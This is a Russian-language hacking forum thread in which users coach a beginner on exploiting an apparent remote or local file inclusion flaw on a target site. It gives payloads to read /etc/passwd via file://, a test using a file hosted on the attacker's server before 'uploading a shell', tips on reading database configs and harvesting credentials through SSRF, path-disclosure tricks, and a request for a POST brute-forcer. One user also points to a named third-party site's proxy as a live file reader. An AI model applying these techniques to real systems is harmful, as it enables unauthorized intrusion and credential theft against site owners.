Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=http://hack.ru/phpinfo.php открывает пхп инфо моего сайта(hack).
а зачем тебе phpinfo атакуемого сайта? вопрос вообще про инклуд сначала был /etc/shells /etc/passwd по классике попробуй проинклудить
site.com/blablabla= site=i.txt в i.txt <?php phpinfo();?> а что если, file:///etc/passwd || http://127.0.0.1:80
в i.txt <?php phpinfo();?> - открыл как текстовый тхт. file:///etc/passwd || http://127.0.0.1:80 - нет результатов(((
file:///etc/passwd да вот только что нашел,ток в другом месте root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh /etc/group crontab:x:102: Debian-exim:x:103: mlocate:x:104: ssh:x:105: А есть брут??работающий с post запросами?
Просто залей на hack.ru файл phpcode.txt с содержимым <?php echo 'okay dude'; ?> и открой в браузере site.com/blablabla=phpcode.txt . Если в странице будет присутствовать только "okay dude" то значит это реально рабочий RFI и осталось только залить шелл. Если в страницу будет тупо включено содержимое phpcode.txt вместе с тегами <?php то это не RFI а банальный file_get_contents. Хотя и с помощью него можно попробовать что-нибудь сделать, например прочитать конфиг сайта с паролем к БД. Но перед тем как тыкать неизвестно куда неизвестно что я рекомендую тебе выучить пхп, иначе ты нуб
На самом деле больше похоже на XSRF. Т.е. сервер site.com получает URL, идет по нему, забирает контент и отдает его уже тебе. посмотри в логах своего веб сервера на hack.com с каким юзер-агентом он приходит к тебе. можно попробовать в ответ на запрос ему отдать 401-й код - вдруг прилетят авторизационные данные. Если бы была винда - смог бы отрелеиться.
file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше
ищите логи, конфиги. На самом деле я лично не одну такую уязвимость не нашёл, только в тасках. Лучше сайт выкладывайте, там может быть не includ, с как сказали раньше ссрф, а может ещё что-то
вот вот("и зачем читать passwd когда у него RFI?") тс как бы учится, и хер знает rfi там или lfi, или вообще fopen или file_get_contents "На самом деле я лично не одну такую уязвимость не нашёл, только в тасках" да ладно, вчера такую нашел, просто искать надо правда там не lfi а чтение файлов через fopen, но всё же тс, ошибки php на сайт выводятся? если да надо узнать докрут до сайта(или каким нибудь другим способом) и первым делом прочитать уязвимый скрипт
Я вообще уже давно ничего не ищу, захожу на форум, а тут уже найдено, бери,, да пробуй раскрутить ))) Сцука, я ленивый.
нуу лень она двигатель типа)) http://dantant.com/proxy/miniProxy.php/http://google.com/ для примера, прокся типа, хотя по факту читалка файлов сам ещё толком не крутил, там какая то свалка на домене)
Живого места на том сайте нету, инклуд нашёл, и заливку файлов, но версия пхп высокая И много таких прикольных моментов. Но почему я только сейчас стал обращать на это внимания п.с спасибо за сыль, будет чем заняться на досуге
Значит смотри, если у тебя получилось прочитать локальный файл, ищи раскрытие путей например пост в авторизации site.com/login post data login[]=lol дает нам /var/www/site.com/public_html/lol/db.php error 31 line тогда мы имеем следующую возможность чтения file:///var/www/site.com/public_html/index.php